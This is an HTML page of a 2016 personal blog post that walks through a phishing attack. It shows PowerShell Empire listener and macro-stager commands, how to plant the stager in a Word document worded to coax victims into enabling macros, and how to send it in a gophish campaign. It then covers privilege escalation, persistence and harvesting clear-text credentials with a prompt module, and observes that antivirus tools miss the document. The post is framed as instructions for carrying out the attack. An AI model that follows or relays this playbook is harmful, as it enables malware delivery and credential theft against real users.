<!DOCTYPE html>
<html>

<head>
  <meta charset="utf-8">
  <meta itemprop="name" content="Basic Social Engineering example">
  <title>Basic Social Engineering example</title>

  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta itemprop="description" content="Word macros are one of the top sources of malware infection. Creating such a malicious macro can be done in less than 10 minutes.">

  
  <meta itemprop="keywords" content="hacking, social engineering, word macros, gophish" />
  
    <meta itemprop="wordCount" content="498">
  

  <meta property="og:title" content="Basic Social Engineering example" />
  <meta property="og:description" content="This is my personal blog to keep track of stuff I am doing after hours." />
  <meta property="og:type" content="website" />
  <meta property="og:url" content="http://localhost:1313/blog/2016/07/Basic-Social-Engineering-example/" />
  

  
  <meta property="og:updated_time" content="2016-07-15 10:46:59 &#43;0000 UTC"/>
  
  
  
  

  
    <meta name="twitter:card" content="summary"/>
  

  
  <meta name="twitter:title" content="Basic Social Engineering example"/>
  <meta name="twitter:description" content="This is my personal blog to keep track of stuff I am doing after hours."/>
  
  

  <link href="" rel="alternate" type="application/rss+xml" title="camelinc" />
  <link href="http://localhost:1313//css/bootstrap.min.css" rel="stylesheet">
  <link href="http://localhost:1313//css/hc.css" rel="stylesheet">

  
  <link rel="stylesheet" href="http://localhost:1313//css/zenburn.css" type="text/css" media="screen" />

  

  
  <link rel="stylesheet" href="http://localhost:1313//lightbox/css/lightbox.css" type="text/css" media="screen">

  <meta name="generator" content="Hugo 0.16" />
  <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css" rel="stylesheet">
  
  
</head>


  <body>

  
<div class="nav-toggle"><i class="fa fa-bars fa-2x"></i> Herring Cove </div>
  <div id = "wrapper">

<div class="navbar navbar-default" role="navigation">
      <div class="container">
        <div class="navbar-header">
          <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a href="http://localhost:1313//"><p class="navbar-brand">camelinc</p></a>
        </div>

        <div class="navbar-collapse collapse">
          <ul class="nav navbar-nav">
					
          <h2>http://localhost:1313/</h2>
					
					<li><a href="http://localhost:1313/about">About </a></li>
					
					<li><a href="http://localhost:1313/post">Posts </a></li>
					
          </ul>
        </div>
      </div>
    </div>

       
       <div id="sidebar-wrapper">
        <ul class="sidebar-nav">
					<img src="/img/avatar.png" />
          <li class="sidebar-brand"><a href="http://localhost:1313//"><h1 class="brand">camelinc</h1></a><h3>This is my personal blog to keep track of stuff I am doing after hours.</h3></li>
          <hr />

					
						<li><a href="http://localhost:1313/about">About </a></li>
					
						<li><a href="http://localhost:1313/post">Posts </a></li>
					
          <hr />

          <div id="social-wrapper">
           
             <li> <a href="https://twitter.com/camelinc"><i class="fa fa-twitter-square"></i> @twitter</a></li>
           

           
             
           

           
             
           

           
             <li> <a href="https://github.com/camelinc"><i class="fa fa-github-square"></i> github</a> </li>
           
         </div>

       </ul>
     </div>

     <div class="container">


  <div id="article">
    <div class="article-title">Basic Social Engineering example</div>
    <p class="meta"><small>&nbsp;<i class="fa fa-calendar-o"></i> 2016-07-15</small></p> <hr/>
    <div class="post">
      

<h1 id="introduction">Introduction</h1>

<p>Word macros are one of the top sources of malware infection.
Creating such a malicious macro can be done in less than 10 minutes.
This article will give an insight how to perform such an attack with open-source resources.
The best is, that it just takes a few minutes.</p>

<h1 id="preparation">Preparation</h1>

<p>Get a running Kali Linux.
PowerShell Empire will already be installed.
This will be our command and control tool.</p>

<p>Next, download the gophish Docker container.
This tool is used to perform phishing attacks.
Once the web interface working, configure the mail options and prepare a phishing mail template.</p>

<div class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nv">$ </span>dockerpull matteoggl/gophish
<span class="nv">$ </span>docker run –ti –name gopish –p 3333:3333 –p 8083:80 matteoggl/gophish
</code></pre></div>


<p>Also, to create the backdoored Office document a version of Microsoft Office is necessary.</p>

<h1 id="let-s-go-phishing">Let&rsquo;s go phishing</h1>

<p>In Kali Linux start up PowerShell empire.
First, we need to create a listener that waits for client connections.
Do not forget to adjust the ip address.
Subsequently, the malicious macro can be created as a stager.
The resulting script will be saved in a file to the disk.
Copy the macro to the Windows box.</p>

<div class="highlight"><pre><code class="language-bash" data-lang="bash">&gt; listeners
&gt; info
&gt; <span class="nb">set </span>Name LiveHacking
&gt; <span class="nb">set </span>Host http://127.0.0.1:8080
&gt; execute
...
&gt; usestager makro officeMacro
&gt; info
&gt; <span class="nb">set </span>Listener LiveHacking
&gt; execute
</code></pre></div>


<p>On Windows, create a Word document to hold the macro.
Also adjust the visible contents to motivate the user to accept the macro.
Next, the macro has to be added to the document.</p>



<figure class="fcenter">
    <a href="/img/post/2016/malicious-word-macros/word-macro.png" data-lightbox="default" data-title="The stager macro after adding it to the Office document." >
        <img src="/img/post/2016/malicious-word-macros/word-macro.png" alt="The stager macro after adding it to the Office document." >
    </a>
</figure>



<p>The next part is to finalize the phishing campaign.
Switch to the gophish web interface and configure the phishing mail template.
Add the backdoored Word document to the mail template.
Also consider adjusting the text and the subject according to your attack scenario.
After configuring the target users and groups everything should be set and ready.
Create the campaign with the right options and start it when ready.</p>



<figure class="fcenter fsmall">
    <a href="/img/post/2016/malicious-word-macros/gophish-overview.png" data-lightbox="default" data-title="Gophish main interface." >
        <img src="/img/post/2016/malicious-word-macros/gophish-overview.png" alt="Gophish main interface." >
    </a>
</figure>



<p>Once the victim opens the document the macro will execute.
Depending on the version and security settings a warning might pop up or sometimes even prevent the macro from executing.
An agent connection should pop up in PowerShell empire.</p>

<p>The first steps for the new agent are system enumeration, privilege escalation and persistence.
PowerShell empire provides a powerup script, that will check the common attack vectors to gain SYSTEM privileges.
Persistence is necessary if you want to establish a more permanent foothold.
Finally, we also want to have to clear text credentials from the current user.
To get those the collection/prompt module can be utilized.</p>

<div class="highlight"><pre><code class="language-bash" data-lang="bash">&gt; usemodule collection/prompt
&gt; TODO: configure settings
&gt; execute
</code></pre></div>


<h1 id="the-victim">The victim</h1>

<p>Depending on the scenario the user will be more or less suspecting.
Some might scan the document with an antivirus software to be safe.
Unfortunately, the results are quite terrifying.</p>



<figure class="fcenter">
    <a href="/img/post/2016/malicious-word-macros/virustotal-file-analysis.png" data-lightbox="default" data-title="Virustotal results for the backdoored office document." >
        <img src="/img/post/2016/malicious-word-macros/virustotal-file-analysis.png" alt="Virustotal results for the backdoored office document." >
    </a>
</figure>



<h1 id="example-video">Example Video</h1>

<p>Here is a video for the sake of completeness.
Creating a video of the whole attack was quite an experience.
Good thing that I am not in the movie business.</p>


<div style="position: relative; padding-bottom: 56.25%; padding-top: 30px; height: 0; overflow: hidden;">
  <iframe src="//www.youtube.com/embed/F3RBZ5vM7GM" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%;" allowfullscreen frameborder="0"></iframe>
 </div>


<h1 id="links">Links</h1>

<ul>
<li><a href="https://github.com/PowerShellEmpire/Empire">Empire</a></li>
<li><a href="https://enigma0x3.net/2016/03/15/phishing-with-empire/">Phishing with empire</a></li>
<li><a href="https://getgophish.com/">gophish</a></li>
</ul>

    </div>
  </div>

  <ul class="pager">
    

    
      
        &nbsp;<li class="previous"><a href="http://localhost:1313/blog/2016/07/Discovering-juicy-targets-via-DNS/"> Discovering juicy targets via DNS</a></li>
      
    
    
      
        &nbsp;<li class="next"><a href="http://localhost:1313/blog/2016/04/Hacking-and-Attacking-WiFi-networks/"> Hacking and Attacking WiFi networks</a></li>
      
    
  </ul>



<footer>

  <p class="text-muted credit">&copy; 2016. All rights reserved. </p>

  
  

  <script type="text/javascript" src="http://localhost:1313//js/jquery-2.1.4.js"></script>

  <script src="http://localhost:1313//js/bootstrap.min.js"></script>
  <script src="http://localhost:1313//js/bootstrap.js"></script>
  <script type="text/javascript" src="http://localhost:1313//js/hc.js"></script>

  
  <script type="text/javascript" src="http://localhost:1313//lightbox/js/lightbox.js"></script>
  
  <script>
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
    })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

    ga('create', "UA-83225898-1", 'auto');
    ga('send', 'pageview');
  </script>
  

  

</footer>

	<script data-no-instant>document.write('<script src="/livereload.js?mindelay=10"></' + 'script>')</script></body>
</html>
